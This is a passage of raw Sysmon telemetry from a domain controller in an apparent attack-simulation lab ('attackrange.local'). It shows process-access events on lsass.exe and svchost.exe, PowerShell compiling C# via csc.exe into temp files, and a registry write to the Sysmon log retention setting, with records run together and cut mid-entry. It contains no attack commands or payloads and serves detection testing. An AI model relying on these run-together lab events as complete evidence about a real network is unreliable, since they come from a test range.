12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6441-6064-DD02-00000000AD01}5116C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6441-6064-DD02-00000000AD01}5116C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.831{266CAFBE-6441-6064-DD02-00000000AD01}5116C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-6441-6064-D466-120000000000}0x1266d40HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-62DD-6064-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.826{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.795{266CAFBE-641B-6064-3202-00000000AD01}5032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A6C93EF11B43F8A31C4600397CBFF244,SHA256=2FE2E98A7E44C6FEE8F32C20338A7C17B993D186FAE65A8FB8A67CF29FEFE5BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.795{266CAFBE-641B-6064-3202-00000000AD01}5032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=AEF1FD89F890E7C8A1D5825E9E97B6BB,SHA256=4A12E9EA523AF07FFE6C9A19A255BA623D31AAC12B24A310CBE74E4D654A03EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.685{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.685{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.670{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.654{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.654{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.654{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.623{266CAFBE-6440-6064-D802-00000000AD01}4220ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.591{266CAFBE-6440-6064-D902-00000000AD01}3712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:01.545{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\RetentionDWORD (0x00000000) 23542300x8000000000000000620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.232{266CAFBE-6440-6064-D902-00000000AD01}3712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.cmdlineMD5=E9A1CCC35BAEA088C7D99C8314EA9603,SHA256=10B503EB5C6CFAC25725EED20B79B0616348E79BF47DD48131C30643E9421854,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.232{266CAFBE-6440-6064-D902-00000000AD01}3712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.0.csMD5=054C0A1487614BA970CB949FA443FFFB,SHA256=6B88C7F565FF6B5879B03F6F3622B596B63D0C76E3EC5751390A446AF187E21D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.232{266CAFBE-6440-6064-D902-00000000AD01}3712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.outMD5=CE44EC5685EA48CDFB043DE2D6FF69E7,SHA256=005E0886995FDD173D551BA228A2F9269986C7D31AB021B27559180B7B94B314,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.232{266CAFBE-6440-6064-D902-00000000AD01}3712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.pdbMD5=0EF1CFD50038DCC7E6B20ADF4D88B075,SHA256=F5D5457FCF0EB48F37632569CF915E7721A2A0474057A4653E8921C202BB7EAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.232{266CAFBE-6440-6064-D902-00000000AD01}3712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.dllMD5=8A63C7D37178433B962D9162A202127C,SHA256=EBD08AC072049CE67F9D3D9C2DF01FF9239D5872C98A43E8EE664B49F813D1A0,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 10341000x8000000000000000615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.216{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.216{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.216{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.216{266CAFBE-6441-6064-DB02-00000000AD01}4132ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\CSCB304B5D2C80A486A9F374553E2D2FFEC.TMPMD5=11300D729435B9F74063D6D241CA597A,SHA256=0DDEF9CDBC4D7291271DA9F7EF659CF9111D4FA48D2F63CED16C6ED2F227C54C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:00:01.216{266CAFBE-6441-6064-DB02-00000000AD01}4132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.dll2021-03-31 12:00:01.107 23542300x8000000000000000610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.216{266CAFBE-6441-6064-DB02-00000000AD01}4132ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.216{266CAFBE-6441-6064-DB02-00000000AD01}4132ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\RESD28A.tmpMD5=575CA4D2122A3CB93DF9F3E09BB48D00,SHA256=123DAF9B62137BF993ABB90469D80834FFB1E7329AFB2FE7FF1AF4A4A654FC19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.216{266CAFBE-6441-6064-DC02-00000000AD01}2016ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\RESD28A.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.201{266CAFBE-6440-6064-D602-00000000AD01}12965004C:\Windows\system32\conhost.exe{266CAFBE-6441-6064-DC02-00000000AD01}2016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 